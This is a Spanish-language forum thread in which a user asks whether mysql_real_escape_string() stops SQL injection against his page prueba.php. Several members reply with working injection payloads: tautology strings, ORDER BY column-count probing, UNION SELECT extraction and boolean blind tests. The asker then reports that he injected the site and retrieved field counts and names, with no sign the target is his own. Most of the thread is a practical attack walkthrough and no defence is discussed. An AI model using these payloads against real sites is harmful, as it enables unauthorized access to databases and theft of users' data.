Autor
|
Tema: Una duda de SQL injection (Leído 5,730 veces)
|
baZZ
Desconectado
Mensajes: 168
|
Buenas pues mi pregunta es, ¿se puede hacer una inyeccion sql a una variable a la que se le pasa mysql_real_escape_string()? ¿Ejemplos? Gracias
|
|
|
En línea
|
- EVGA ATX - Intel X58 - i7 920 @ 3,2 Ghz - 2x260 gtx 216 SLI - 3x1 GB OCZ DIMM DDR3 1600 Mhz - Tacens Sagitta II - Seagate 7200.12 Falta: - T.R.U.E ^^ - i7 @ 4,0 Ghz
|
|
|
HardieVon
Desconectado
Mensajes: 181
Programming HardCore
|
claro que si
$consulta = "SELECT * FROM usuarios WHERE id=$_GET['id'] ORDER BY 7";
?id=-1 UNION 1,2,3,4,5,6,7 FROM...
no veo que uses caracteres especiales
|
|
|
En línea
|
|
|
|
baZZ
Desconectado
Mensajes: 168
|
tengo lo siguiente:
prueba.php?=Pedro
Entonces esto me muestra los datos del usuario Pedro. Si hago lo siguiente:
prueba.php?='
Me muestra esto: Execute query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
Sigo investigando y si hago esto: prueba.php?=x' or 'x' = 'x
Y efectivamente me muestra el primer usuario que coge de la tabla. Digamos que conozco mas o menos los nombres de las tablas y campos de la BD, ¿puedo explotarlo más?
|
|
|
En línea
|
- EVGA ATX - Intel X58 - i7 920 @ 3,2 Ghz - 2x260 gtx 216 SLI - 3x1 GB OCZ DIMM DDR3 1600 Mhz - Tacens Sagitta II - Seagate 7200.12 Falta: - T.R.U.E ^^ - i7 @ 4,0 Ghz
|
|
|
Darioxhcx
Desconectado
Mensajes: 2.294
|
union select ? order by ?
me confundi (?
|
|
|
En línea
|
|
|
|
WHK
|
prueba.php?=Pedro' order by 999 -- Si no resulta es porque procesa carácteres codificados por utf-8: prueba.php?=Pedro' USING utf8) order by 999 --
Si te funciona después pruebas con order by 10, si te da error es porque es mas de 10 y menos de 999, cuando da error es porque el número debe ser superior (ese número te indica la cantidad de columnas de la tabla). Cuando order by 15 te de error y el 16 no te de error entonces haces un union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 -- No es necesario que uses números coorelativos, es solo para poder visualizar que tabla se imprime en la página y poder hacer devolver datos desde otras tablas.
|
|
|
En línea
|
|
|
|
OzX
Desconectado
Mensajes: 406
[NuKe] Team
|
Hi Bro Prueba esto
prueba.php?=Pedro'+and+1=0+--+ prueba.php?=Pedro'+and+1=1+--+
Te muestra un Resultado Verdadero o Falso? Osea cuando haces prueba.php?=Pedro'+and+1=1+--+ Te muestra lo Mismo que si haces. prueba.php?=Pedro ? Es Probable que Sean Las Magic Quotes Del Php. Saludos Oz¡
|
|
|
En línea
|
Undersecurity.net
|
|
|
WHK
|
Hi Bro Prueba esto
prueba.php?=Pedro'+and+1=0+--+ prueba.php?=Pedro'+and+1=1+--+
Te muestra un Resultado Verdadero o Falso? Osea cuando haces prueba.php?=Pedro'+and+1=1+--+ Te muestra lo Mismo que si haces. prueba.php?=Pedro ? Es Probable que Sean Las Magic Quotes Del Php. Saludos Oz¡
prueba.php?='
Me muestra esto: Execute query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
Sigo investigando y si hago esto: prueba.php?=x' or 'x' = 'x
Y efectivamente me muestra el primer usuario que coge de la tabla. Digamos que conozco mas o menos los nombres de las tablas y campos de la BD, ¿puedo explotarlo más? Si tuviera magic quotes activado entonces la comilla hubiera sido parte de la query y no le hubiera dado error de sintaxis ya que debería haber debuelto que el valor era nulo, además dice que Sigo investigando y si hago esto: prueba.php?=x' or 'x' = 'x Y efectivamente me muestra el primer usuario que coge de la tabla. Significa que si pudo inyectar código, solo que ahora necesita saber cuantas columnas contiene la tabla para poder hacer la ubnion y lanzar las demás sentencias. Saludos.
|
|
|
En línea
|
|
|
|
baZZ
Desconectado
Mensajes: 168
|
Ya pude inyectar, conseguir el numero de campos e incluso algunos nombres de campos lo cual me dio bastante info. Gracias a todos
|
|
|
En línea
|
- EVGA ATX - Intel X58 - i7 920 @ 3,2 Ghz - 2x260 gtx 216 SLI - 3x1 GB OCZ DIMM DDR3 1600 Mhz - Tacens Sagitta II - Seagate 7200.12 Falta: - T.R.U.E ^^ - i7 @ 4,0 Ghz
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
(DUDA) Haciendo SQL Injection.
« 1 2 »
Nivel Web
|
flowskull
|
16
|
9,876
|
1 Abril 2012, 23:57 pm
por afdlkglfgfdgfhgf
|
|
|
Duda con Sql Injection en Sql Map
Nivel Web
|
Blackhawk222
|
3
|
3,213
|
14 Febrero 2012, 11:24 am
por cibergolen
|
|
|
Duda sobre sql injection
Nivel Web
|
Mapcimus
|
2
|
3,288
|
20 Julio 2013, 02:42 am
por Mapcimus
|
|
|
Xss injection & sql injection pequeña duda.
Nivel Web
|
6666
|
6
|
3,863
|
12 Septiembre 2014, 07:27 am
por 6666
|
|
|
Duda sobre SQL injection
Seguridad
|
JoseGutrz
|
5
|
3,223
|
15 Abril 2017, 06:51 am
por engel lex
|
|